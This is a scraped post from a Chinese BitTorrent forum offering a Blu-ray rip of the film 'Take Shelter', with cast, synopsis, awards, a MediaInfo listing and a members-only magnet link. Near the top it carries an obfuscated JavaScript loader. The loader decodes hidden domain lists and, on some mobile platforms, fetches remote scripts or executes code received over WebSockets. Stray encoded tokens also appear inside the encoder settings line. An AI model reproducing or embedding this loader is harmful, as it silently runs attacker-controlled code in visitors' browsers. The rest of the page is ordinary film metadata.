存身[简繁字幕].Take.Shelter.2011.1080p.BluRay.x264.DTS-迅雷下载 18.95GB

版主小s 27天前 211

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 存身 / 历劫重生(台) / 寻求庇护 / 末日惊防(港)

◎片 名 Take Shelter

◎年 代 2011

◎产 地 美国

◎类 别 剧情 / 悬疑 / 惊悚

◎语 言 英语

◎上映日期 2011-09-30(美国)

◎IMDb评分 7.4/10 from 92359 users

◎IMDb链接 https://www.imdb.com/title/tt1675192

◎豆瓣评分 7.0/10 from 4911 users

◎豆瓣链接 https://movie.douban.com/subject/5150245/

◎片 长 121分钟

◎导 演 杰夫·尼克尔斯 Jeff Nichols

◎编 剧 杰夫·尼克尔斯 Jeff Nichols

◎主 演 迈克尔·珊农 Michael Shannon

杰西卡·查斯坦 Jessica Chastain

谢伊·惠格姆 Shea Whigham

◎标 签 美国 | 悬疑 | 心理 | 剧情 | 2011 | 惊悚 | 美国电影 | 独立电影

◎简 介

柯蒂斯(迈克尔·珊农 Michael Shannon 饰)是个建筑工人,非常辛苦地工作养家,幸而和妻子萨曼莎(杰西卡·查斯坦 Jessica Chastain 饰)感情和睦,还有个六岁的听障女儿汉娜。有一天,柯蒂斯被一个非常真实的噩梦惊醒,梦里面有恐怖的龙卷风到来,下起柏油一样的雨,整个镇子被夷为平地。从此类似的噩梦经常出现,柯蒂斯渐渐开始相信,认为这是末世启示,梦里发生的一切都被他带到现实,他开始变得暴躁、沉默,还在家里建风暴掩体,甚至丢了工作。萨曼莎不理解丈夫的一系列变化,认为他生病了,应该看心理医生,还为他花许多钱建毫无用处的东西、买昂贵又毫无用处的防毒面具、丢了工作没了医疗保险大为光火。柯蒂斯的“症状”越来越严重,也越来越为人所不容,他的境遇,取决于他预见的风暴到底会不会到来……

◎获奖情况

第64届戛纳电影节(2011)

影评人周单元 影评人周单元大奖 杰夫·尼克尔斯

影评人周单元 剧作家和作曲家协会奖 杰夫·尼克尔斯

费比西奖 导演双周单元 杰夫·尼克尔斯

第27届美国独立精神奖(2012)

最佳影片(提名) 索菲亚·林 / 泰勒·戴维森

最佳导演(提名) 杰夫·尼克尔斯

最佳男主角(提名) 迈克尔·珊农

最佳女配角(提名) 杰西卡·查斯坦

制片新人奖 索菲亚·林

第10届华盛顿影评人协会奖(2011)

最佳男主角(提名) 迈克尔·珊农

第16届圣地亚哥影评人协会奖(2011)

年度劳模 杰西卡·查斯坦

最佳男主角 迈克尔·珊农

最佳摄影(提名) 亚当·斯通

第24届芝加哥影评人协会奖(2011)

最佳男主角 迈克尔·珊农

  1. General

  2. Unique ID : 224978184796940390317071656611281205657 (0xA94138E838E96904820ABBB4E7CD7999)

  3. Complete name : Take.Shelter.2011.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 18.9 GiB

  7. Duration : 2 h 1 min

  8. Overall bit rate : 22.4 Mb/s

  9. Encoded date : UTC 2021-07-04 05:19:58

  10. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 2 h 1 min

  22. Bit rate : 21.6 Mb/s

  23. Width : 1 920 pixels

  24. Height : 816 pixels

  25. Display aspect ratio : 2.35:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.574

  33. Stream size : 18.3 GiB (96%)

  34. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=16.0000 / qcomp=0.40 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. ID in the original source medium : 4352 (0x1100)

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 2 h 1 min

  46. Bit rate mode : Constant

  47. Bit rate : 768 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 24 bits

  53. Compression mode : Lossy

  54. Stream size : 666 MiB (3%)

  55. Language : English

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Text #1

  60. ID : 3

  61. ID in the original source medium : 4610 (0x1202)

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 57 min

  67. Bit rate : 26.3 kb/s

  68. Count of elements : 2104

  69. Stream size : 22.1 MiB (0%)

  70. Title : 简英

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4611 (0x1203)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 57 min

  83. Bit rate : 26.5 kb/s

  84. Count of elements : 2104

  85. Stream size : 22.3 MiB (0%)

  86. Title : 繁英

  87. Language : Chinese

  88. Default : No

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Text #3

  92. ID : 5

  93. ID in the original source medium : 4612 (0x1204)

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 1 h 57 min

  99. Bit rate : 14.4 kb/s

  100. Count of elements : 2104

  101. Stream size : 12.1 MiB (0%)

  102. Title : 简中

  103. Language : Chinese

  104. Default : No

  105. Forced : No

  106. Original source medium : Blu-ray


  107. Text #4

  108. ID : 6

  109. ID in the original source medium : 4613 (0x1205)

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 1 h 57 min

  115. Bit rate : 14.6 kb/s

  116. Count of elements : 2104

  117. Stream size : 12.2 MiB (0%)

  118. Title : 繁中

  119. Language : Chinese

  120. Default : No

  121. Forced : No

  122. Original source medium : Blu-ray


  123. Text #5

  124. ID : 7

  125. ID in the original source medium : 4609 (0x1201)

  126. Format : PGS

  127. Muxing mode : zlib

  128. Codec ID : S_HDMV/PGS

  129. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  130. Duration : 1 h 53 min

  131. Bit rate : 20.5 kb/s

  132. Count of elements : 1770

  133. Stream size : 16.7 MiB (0%)

  134. Title : 英语

  135. Language : English

  136. Default : No

  137. Forced : No

  138. Original source medium : Blu-ray


  139. Menu

  140. 00:00:00.000 : 第 01 章

  141. 00:10:31.005 : 第 02 章

  142. 00:19:32.421 : 第 03 章

  143. 00:33:11.114 : 第 04 章

  144. 00:49:16.745 : 第 05 章

  145. 00:57:32.782 : 第 06 章

  146. 01:06:26.065 : 第 07 章

  147. 01:25:08.895 : 第 08 章

  148. 01:34:27.078 : 第 09 章

  149. 01:51:04.866 : 第 10 章



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 惊悚 悬疑

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回